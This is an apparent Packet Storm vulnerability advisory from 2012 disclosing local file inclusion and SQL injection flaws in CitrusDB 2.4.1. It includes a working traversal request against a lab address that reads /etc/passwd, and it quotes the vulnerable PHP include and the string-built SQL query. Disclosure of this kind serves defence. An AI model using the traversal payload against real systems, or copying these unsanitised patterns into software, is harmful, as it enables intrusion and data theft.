CitrusDB 2.4.1 Local File Inclusion / SQL Injection

2012-04-07T00:00:00
ID PACKETSTORM:111693
Type packetstorm
Reporter Michal Blaszczak
Modified 2012-04-07T00:00:00

Description

                                        
                                            `CitrusDB 2.4.1 - LFI/SQLi Vulnerability  
Author: Michal `wacky` Blaszczak   
WWW: blaszczakm.blogspot.com  
  
  
CitrusDB is an open source customer service and billing database.  
It can be used by customer service personnel to provide sales and support to customers,   
and by billing staff to bill customers for their services via invoices and credit card batches.   
Customers may access the Online customer account manager to view their services, billing history,  
and make service and support requests online.  
  
1) LFI  
http://192.168.51.8/lab/citrus-2.4.1/index.php?load=../../../../../etc/passwd%00&type=base  
  
index.php:315  
  
$filepath = "$path_to_citrus/$load.php";  
if (file_exists($filepath)) {  
include('./'.$load.'.php');  
  
  
2) SQL INJECTION  
  
include/user.class.php:134  
  
$sql="SELECT password FROM user WHERE username='$user_name' LIMIT 1";  
`